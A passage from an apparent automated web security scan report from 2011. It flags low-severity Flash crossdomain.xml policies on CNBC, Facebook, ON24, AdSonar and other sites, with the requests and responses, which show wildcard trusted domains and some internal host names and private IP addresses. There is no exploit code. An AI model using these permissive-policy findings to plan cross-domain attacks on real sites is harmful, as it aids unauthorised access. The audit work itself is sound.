<allow-access-from domain="*.crossmediaservices.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.shoplocal.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.target.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.publix.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.homedepot.com" />
<allow-access-from domain="weeklyad.lowes.com" />
<allow-access-from domain="instorespecials.staples.com" />
<allow-access-from domain="weeklyad.staples.com" />
<allow-access-from domain="weeklyad.cvs.com" />
<allow-access-from domain="weeklyad.circuitcity.com" />
<allow-access-from domain="www.jcpstoreads.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="192.168.0.251" />
<allow-access-from domain="10.200.1.53" />
<allow-access-from domain="10.200.1.59" />
<allow-access-from domain="10.200.1.61" />
<allow-access-from domain="v-devweb1" />
<allow-access-from domain="d-pshahrava" />
<allow-access-from domain="192.168.0.9" />
<allow-access-from domain="192.168.0.10" />
<allow-access-from domain="192.168.0.111" />
<allow-access-from domain="192.168.0.36" />
<allow-access-from domain="172.16.200.22" />
<allow-access-from domain="172.16.200.23" />
<allow-access-from domain="d-dmoore2" />
<allow-access-from domain="vqascweb1" />
<allow-access-from domain="vqascweb2" />
<allow-access-from domain="localhost" />
<allow-access-from domain="devweb1" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="data.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="speed.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="mirror.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="geo.pointroll.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="m.doubleclick.net" />
<allow-access-from domain="m2.doubleclick.net" />
<allow-access-from domain="m3.doubleclick.net" />
<allow-access-from domain="m.2mdn.net" />
<allow-access-from domain="m1.2mdn.net" />
<allow-access-from domain="m2.2mdn.net" />
<allow-access-from domain="creatives.doubleclick.net" />
<allow-access-from domain="motifcdn2.doubleclick.net" />
<allow-access-from domain="motifcdn.doubleclick.net" />
<allow-access-from domain="*.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="dfa.doubleclick.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.ippixel.com" />
<allow-access-from domain="www.wearepixel.com" />
<allow-access-from domain="www.yourlexusdealer.com" />
<allow-access-from domain="yourlexusdealer.com" />
<allow-access-from domain="devcpd1.yourlexusdealer.com" />
<allow-access-from domain="staging.yourlexusdealer.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="zshalla.desktop.amazon.com" />
<allow-access-from domain="snowbank.amazon.com" />
<allow-access-from domain="weeklyad.amazon.com" />
<allow-access-from domain="d-trobertson" secure="false"/>
...[SNIP]...
<allow-access-from domain="vmu-shd-fb1.sf.akqa.com"/>
<allow-access-from domain="tarjoukset.hs.fi" />
<allow-access-from domain="8.17.173.144" />
<allow-access-from domain="www.targetweeklyadapps.com" />
<allow-access-from domain="*.intellitxt.com" />
<allow-access-from domain="*.richrelevance.com" />
<allow-access-from domain="devcpd2.yourlexusdealer.com" />
<allow-access-from domain="dev.big5.adhostclient.com" />
<allow-access-from domain="big5sportinggoods.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.big5sportinggoods.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.sears.com" />
<allow-access-from domain="*.kmart.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.designkitchen.com" />
<allow-access-from domain="*.michaels.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.bonton.com" />
<allow-access-from domain="*.elder-beerman.com" />
<allow-access-from domain="*.carsons.com" />
<allow-access-from domain="*.bostonstore.com" />
<allow-access-from domain="*.younkers.com" />
<allow-access-from domain="*.parisian.com" />
<allow-access-from domain="*.herbergers.com" />
<allow-access-from domain="*.bergners.com" />
<allow-access-from domain="flyer.canadiantire.ca" />
<allow-access-from domain="circulaire.canadiantire.ca" />
<allow-access-from domain="cdn.uc.atwola.com" />
<allow-access-from domain="*.workalicious.com" />
<allow-access-from domain="*.liquidus.net" />
<allow-access-from domain="ec2-67-202-62-111.compute-1.amazonaws.com"/>
<allow-access-from domain="ec2-184-72-169-190.compute-1.amazonaws.com"/>
<allow-access-from domain="*.washingtonpost.com"/>
<allow-access-from domain="69.20.118.121" />
<allow-access-from domain="*.startribune.com" />
...[SNIP]...

4.86. http://data.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:07 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 01 Apr 2009 19:06:33 GMT
ETag: "12a-46683038a8040"
Accept-Ranges: bytes
Content-Type: application/xml
Via: 1.1 aicache6
Content-Length: 298
X-Aicache-OS: 64.210.194.245:80
Connection: Keep-Alive
Keep-Alive: max=20

<?xml version="1.0"?>
<!-- http://stage.ticker.cnbc.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.87. http://developers.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: developers.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.136.154.104
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.88. http://disqus.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://disqus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: disqus.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:32 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
X-User: anon:608614822849
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

4.89. http://edge.sapient.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://edge.sapient.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.sapient.com

Response

HTTP/1.0 200 OK
Content-Length: 588
Content-Type: text/xml
Last-Modified: Thu, 23 Apr 2009 19:45:38 GMT
Accept-Ranges: bytes
ETag: "5321c4134cc4c91:1edd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Tue, 06 Sep 2011 15:32:33 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"[]>
<cross-domain-policy>
<allow-access-from domain="*.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sapientem.com" secure="false" />
...[SNIP]...
<allow-access-from domain="sapient.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="edge-dev.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="localhost" secure="false" />
...[SNIP]...

4.90. http://event.on24.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://event.on24.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.on24.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:40 GMT
Server: Apache
Last-Modified: Sat, 18 Jun 2011 00:37:19 GMT
Accept-Ranges: bytes
Content-Length: 3138
Connection: close
Content-Type: application/xml; charset=utf-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="i.cmpnet.com" />
<allow-access-from domain="www.ttglive.com" />
<allow-access-from domain="www.ddj.com" />
<allow-access-from domain="building.co.uk" />
<allow-access-from domain="http.earthcache.net" />
...[SNIP]...
<allow-access-from domain="webcast.on24.com" />
<allow-access-from domain="*.on24.com" />
<allow-access-from domain="a659.g.akamai.net" />

<allow-access-from domain="wcc.webeventservices.com" />
   <allow-access-from domain="event.meetingstream.com" />
   <allow-access-from domain="event.ciscowebseminars.com" />
   <allow-access-from domain="webcast.premiereglobal.com" />
<allow-access-from domain="event.cisco-live.com" />
<allow-access-from domain="*.cisco.com" />
<allow-access-from domain="*.cisco-live.com" />
   <allow-access-from domain="*.ciscolivevirtual.veplatform.com" />
   <allow-access-from domain="*.onlineseminarsolutions.com" />
   <allow-access-from domain="intelwc.on24.com" />

<allow-access-from domain="*.ogilvy.com" />
<allow-access-from domain="motifcdn2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.fr.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.se.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.de.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="event.webcast.meetyoo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="webcast.acrobat.com" secure="true" />
...[SNIP]...
<allow-access-from domain="wccqa.webeventservices.com" />
   <allow-access-from domain="eventqa.meetingstream.com" />
   <allow-access-from domain="eventqa.ciscowebseminars.com" />
   <allow-access-from domain="webcastqa.premiereglobal.com" />

<allow-access-from domain="eventqa.webcast.meetyoo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="webcastqa.acrobat.com" secure="true" />
...[SNIP]...
<allow-access-from domain="livestream.webex.com" secure="true" />
...[SNIP]...
<allow-access-from domain="event.vcallinteraction.com" secure="true" />
...[SNIP]...
<allow-access-from domain="eventqa.vcallinteraction.com" secure="true" />
...[SNIP]...
<allow-access-from domain="vshowqa.on24.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.inbfw.com"/>
   <allow-access-from domain="ciscovirtualevents.webex.com"/>
   <allow-access-from domain="vmc.lillypro.co.uk"/>
   
   <allow-access-from domain="on24.force.com" secure="true" />
...[SNIP]...

4.91. https://event.on24.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://event.on24.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.on24.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:41 GMT
Server: Apache
Last-Modified: Sat, 18 Jun 2011 00:37:19 GMT
Accept-Ranges: bytes
Content-Length: 3138
Connection: close
Content-Type: application/xml; charset=utf-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="i.cmpnet.com" />
<allow-access-from domain="www.ttglive.com" />
<allow-access-from domain="www.ddj.com" />
<allow-access-from domain="building.co.uk" />
<allow-access-from domain="http.earthcache.net" />
...[SNIP]...
<allow-access-from domain="webcast.on24.com" />
<allow-access-from domain="*.on24.com" />
<allow-access-from domain="a659.g.akamai.net" />

<allow-access-from domain="wcc.webeventservices.com" />
   <allow-access-from domain="event.meetingstream.com" />
   <allow-access-from domain="event.ciscowebseminars.com" />
   <allow-access-from domain="webcast.premiereglobal.com" />
<allow-access-from domain="event.cisco-live.com" />
<allow-access-from domain="*.cisco.com" />
<allow-access-from domain="*.cisco-live.com" />
   <allow-access-from domain="*.ciscolivevirtual.veplatform.com" />
   <allow-access-from domain="*.onlineseminarsolutions.com" />
   <allow-access-from domain="intelwc.on24.com" />

<allow-access-from domain="*.ogilvy.com" />
<allow-access-from domain="motifcdn2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.fr.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.se.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.de.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="event.webcast.meetyoo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="webcast.acrobat.com" secure="true" />
...[SNIP]...
<allow-access-from domain="wccqa.webeventservices.com" />
   <allow-access-from domain="eventqa.meetingstream.com" />
   <allow-access-from domain="eventqa.ciscowebseminars.com" />
   <allow-access-from domain="webcastqa.premiereglobal.com" />

<allow-access-from domain="eventqa.webcast.meetyoo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="webcastqa.acrobat.com" secure="true" />
...[SNIP]...
<allow-access-from domain="livestream.webex.com" secure="true" />
...[SNIP]...
<allow-access-from domain="event.vcallinteraction.com" secure="true" />
...[SNIP]...
<allow-access-from domain="eventqa.vcallinteraction.com" secure="true" />
...[SNIP]...
<allow-access-from domain="vshowqa.on24.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.inbfw.com"/>
   <allow-access-from domain="ciscovirtualevents.webex.com"/>
   <allow-access-from domain="vmc.lillypro.co.uk"/>
   
   <allow-access-from domain="on24.force.com" secure="true" />
...[SNIP]...

4.92. http://executivevision.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://executivevision.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: executivevision.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:04:29 GMT
Connection: close
Content-Length: 3839

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.93. http://js.adsonar.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://js.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.adsonar.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"-gzip
Content-Type: application/xml
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 15:30:15 GMT
Date: Tue, 06 Sep 2011 15:00:15 GMT
Content-Length: 2621
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

4.94. http://login.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: login.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:23 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Tue, 17 Mar 2009 16:47:10 GMT
ETag: "e0006-f5-4655351729f80"
Accept-Ranges: bytes
Content-Length: 245
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.95. https://login.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: login.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:36 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Tue, 17 Mar 2009 16:47:10 GMT
ETag: "e0006-f5-4655351729f80"
Accept-Ranges: bytes
Content-Length: 245
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.96. http://m.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

